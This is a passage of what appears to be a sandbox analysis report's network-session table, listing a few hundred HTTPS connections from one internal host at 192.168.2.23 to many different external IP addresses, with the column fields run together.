                                            17015192.168.2.2336784124.155.237.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17016192.168.2.2339288184.6.152.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17017192.168.2.2360528103.11.221.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17018192.168.2.2349198102.29.101.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17019192.168.2.2344016152.74.73.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17020192.168.2.2348036162.67.142.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17021192.168.2.235413425.89.83.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17022192.168.2.2351870121.79.195.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17023192.168.2.2347008155.57.4.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17024192.168.2.233614046.162.145.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17025192.168.2.235723219.221.219.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17026192.168.2.235062694.78.159.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17027192.168.2.2341894171.73.46.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17028192.168.2.234825872.125.93.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17029192.168.2.2337152198.149.172.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17030192.168.2.234449618.215.169.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17031192.168.2.23476761.118.217.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17032192.168.2.236058459.4.243.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17033192.168.2.2338614204.166.115.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17034192.168.2.2347332158.141.217.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17035192.168.2.234369841.186.35.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17036192.168.2.2341352179.198.76.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17037192.168.2.2351434197.37.75.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17038192.168.2.235196482.35.203.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17039192.168.2.2342150142.230.161.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17040192.168.2.2355182163.213.116.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17041192.168.2.2359500208.235.206.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17042192.168.2.2340370203.70.149.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17043192.168.2.2342930184.68.133.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17044192.168.2.2343778144.84.134.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17045192.168.2.2341672188.166.205.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17046192.168.2.234199468.255.130.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17047192.168.2.2345682142.57.102.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17048192.168.2.2344046209.201.216.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17049192.168.2.2345190138.97.165.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17050192.168.2.234268660.35.5.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17051192.168.2.23524324.77.40.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17052192.168.2.235965239.45.234.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17053192.168.2.235027461.231.212.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17054192.168.2.235845258.60.205.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17055192.168.2.235386499.63.181.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17056192.168.2.233848293.56.104.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17057192.168.2.2342170135.246.165.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17058192.168.2.2359064220.0.172.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17059192.168.2.2357376205.113.168.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17060192.168.2.2351024126.138.68.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17061192.168.2.233916065.58.212.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17062192.168.2.235342492.227.147.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17063192.168.2.235702841.186.246.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17064192.168.2.2335518158.167.209.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17065192.168.2.234269834.242.255.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17066192.168.2.2360816167.1.194.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17067192.168.2.2346876190.86.85.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17068192.168.2.2332972149.67.85.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17069192.168.2.2346632159.2.87.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17070192.168.2.234408470.122.228.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17071192.168.2.2351342151.245.208.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17072192.168.2.2351212216.134.177.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17073192.168.2.2344486148.153.153.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17074192.168.2.23522364.54.214.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17075192.168.2.233687619.231.202.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17076192.168.2.2344392132.67.72.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17077192.168.2.2357310184.1.90.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17078192.168.2.233787036.230.16.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17079192.168.2.2341328179.226.205.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17080192.168.2.235996442.92.161.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17081192.168.2.235735889.123.65.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17082192.168.2.2347032200.161.123.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17083192.168.2.2353068183.235.41.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17084192.168.2.2341688107.123.44.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17085192.168.2.2335572135.188.16.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17086192.168.2.2357086218.215.26.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17087192.168.2.233414085.121.46.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17088192.168.2.235354258.228.108.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17089192.168.2.234083827.59.178.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17090192.168.2.235026439.67.4.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17091192.168.2.233690453.121.194.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17092192.168.2.2359612101.253.106.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17093192.168.2.235354687.39.225.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17094192.168.2.2357962148.143.207.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17095192.168.2.2352448219.36.58.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17096192.168.2.2354142117.34.44.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17097192.168.2.234577481.204.250.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17098192.168.2.2351442124.42.255.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17099192.168.2.235469047.255.255.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17100192.168.2.233343465.131.230.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17101192.168.2.2345378109.190.81.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17102192.168.2.235892839.197.133.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17103192.168.2.233328870.247.198.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17104192.168.2.235954624.201.153.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17105192.168.2.2337872189.119.61.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17106192.168.2.234127418.10.115.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17107192.168.2.234573617.80.120.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17108192.168.2.2348286125.47.196.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17109192.168.2.233651298.123.151.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17110192.168.2.233852490.94.225.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17111192.168.2.234217466.176.241.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17112192.168.2.2352812144.9.70.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17113192.168.2.235728696.25.2.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17114192.168.2.235476291.87.111.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17115192.168.2.233666418.48.155.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17116192.168.2.2346660147.49.140.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17117192.168.2.2333048102.72.170.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17118192.168.2.2342812207.196.175.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17119192.168.2.234744285.59.103.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17120192.168.2.2333018166.51.164.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17121192.168.2.2345008100.192.249.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17122192.168.2.2347362206.218.56.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17123192.168.2.2336620184.29.196.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17124192.168.2.2349820159.60.115.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17125192.168.2.2351126223.248.243.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17126192.168.2.2350848207.251.163.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17127192.168.2.234589697.192.250.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17128192.168.2.235049249.122.127.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17129192.168.2.2337702140.154.43.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17130192.168.2.2348056156.188.174.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17131192.168.2.2336404206.17.73.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17132192.168.2.236028832.97.127.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17133192.168.2.2338114150.138.175.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17134192.168.2.236071489.215.150.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17135192.168.2.2338824160.93.211.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17136192.168.2.2338306207.143.203.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17137192.168.2.2353938144.136.105.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17138192.168.2.2344168212.144.124.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17139192.168.2.234477649.161.59.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17140192.168.2.23389268.151.208.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17141192.168.2.234454480.46.180.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17142192.168.2.233575024.173.245.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17143192.168.2.234516687.163.80.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17144192.168.2.2337026184.231.54.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17145192.168.2.235717682.75.152.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17146192.168.2.233462044.21.248.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17147192.168.2.2356450121.149.160.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17148192.168.2.2339330106.246.145.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17149192.168.2.235622661.158.232.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17150192.168.2.2335704126.171.212.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17151192.168.2.234301212.71.52.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17152192.168.2.2349640180.98.102.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17153192.168.2.2338316159.141.44.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17154192.168.2.2336558145.231.222.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17155192.168.2.2351404187.106.106.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17156192.168.2.233549272.255.114.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17157192.168.2.235445658.52.104.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17158192.168.2.235312266.217.45.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17159192.168.2.2342432112.3.168.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17160192.168.2.23453822.61.50.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17161192.168.2.235000820.171.27.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17162192.168.2.235516873.61.157.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17163192.168.2.2333602129.185.182.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17164192.168.2.2340214107.37.201.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17165192.168.2.2354216112.144.51.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17166192.168.2.235022427.157.194.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17167192.168.2.2337534220.39.136.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17168192.168.2.235193436.43.57.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17169192.168.2.236069862.13.255.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17170192.168.2.2356574153.108.192.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17171192.168.2.2335328126.124.33.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17172192.168.2.2351616157.207.196.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17173192.168.2.233494669.205.99.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17174192.168.2.233341658.103.117.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17175192.168.2.2347088120.140.225.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17176192.168.2.234687882.58.156.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17177192.168.2.2351060181.90.232.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17178192.168.2.2339660189.205.211.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17179192.168.2.2341846212.227.128.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17180192.168.2.2345340196.165.58.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17181192.168.2.2359786189.47.225.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17182192.168.2.2343028207.135.104.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17183192.168.2.233887852.92.67.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17184192.168.2.2352426190.78.72.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17185192.168.2.2340614168.122.53.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17186192.168.2.236054454.220.162.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17187192.168.2.235378427.133.199.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17188192.168.2.233473891.44.18.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17189192.168.2.2353944119.31.124.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17190192.168.2.235757054.232.111.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17191192.168.2.2353992161.75.125.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17192192.168.2.234071235.59.63.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17193192.168.2.2352442129.10.156.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17194192.168.2.235331012.111.107.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17195192.168.2.2335084180.100.144.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17196192.168.2.233590471.154.52.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17197192.168.2.234409666.198.188.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17198192.168.2.234468436.148.168.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17199192.168.2.2343498220.198.2.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17200192.168.2.2345884141.109.149.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17201192.168.2.2336292132.164.66.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17202192.168.2.2351022200.182.133.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17203192.168.2.235361680.194.20.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17204192.168.2.235512245.137.248.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17205192.168.2.2338922189.75.137.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17206192.168.2.2341776216.204.228.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17207192.168.2.233312489.175.195.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17208192.168.2.2333502175.130.66.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17209192.168.2.235995247.57.189.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17210192.168.2.234157468.30.15.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17211192.168.2.2356202134.72.94.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17212192.168.2.2346484160.129.176.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17213192.168.2.2355516189.29.24.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17214192.168.2.2352466126.160.56.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17215192.168.2.235153284.14.22.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17216192.168.2.235746079.121.101.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17217192.168.2.235972069.47.123.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17218192.168.2.235198268.228.90.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17219192.168.2.2346976173.68.88.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17220192.168.2.235356214.44.73.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17221192.168.2.2334000197.55.19.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17222192.168.2.2345082116.41.149.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17223192.168.2.2347746147.170.232.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17224192.168.2.2354124196.241.41.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17225192.168.2.2343156136.168.62.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17226192.168.2.2347714161.19.159.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17227192.168.2.235484648.92.142.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17228192.168.2.233320486.232.182.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17229192.168.2.235527663.118.26.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17230192.168.2.2352128208.238.206.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17231192.168.2.2335052157.34.81.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17232192.168.2.2355774197.204.87.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17233192.168.2.2346224211.87.235.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17234192.168.2.23428402.20.102.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17235192.168.2.235663480.104.28.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17236192.168.2.2342456183.189.246.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
